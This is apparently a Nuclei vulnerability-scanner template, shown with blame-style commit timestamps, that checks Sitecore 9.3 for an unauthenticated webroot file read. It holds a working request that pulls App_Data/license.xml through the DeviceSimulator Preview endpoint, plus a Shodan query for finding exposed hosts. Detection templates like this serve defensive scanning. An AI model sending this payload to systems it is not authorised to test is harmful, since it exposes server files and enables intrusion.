2023-05-14 21:06:17 +00:00
|
|
|
id: sitecore-lfi
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Sitecore 9.3 - Webroot File Read
|
|
|
|
author: DhiyaneshDK
|
|
|
|
severity: high
|
2024-01-03 06:08:41 +00:00
|
|
|
description: SiteCore 9.3 is vulnerable to LFI.
|
2023-05-14 21:06:17 +00:00
|
|
|
reference:
|
|
|
|
- https://blog.assetnote.io/2023/05/10/sitecore-round-two/
|
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 1
|
2023-05-14 21:06:17 +00:00
|
|
|
shodan-query: title:"Sitecore"
|
2023-06-02 23:20:49 +00:00
|
|
|
tags: sitecore,lfi,misconfig
|
2023-05-14 21:06:17 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2023-05-18 13:54:58 +00:00
|
|
|
- "<signedlicense id="
|
|
|
|
- "<Signature"
|
|
|
|
condition: and
|
2023-05-14 21:06:17 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a004730450221009e359a27a6fbfc5d6d250fd7fcf4a5046af47b8206fba0d418aab933fb648ad2022017d9de93df4875a02db635721ef51289eda8747dc7bb6d26c4eacedbf0c28c43:922c64590222798bb761d5b6d8e72950
|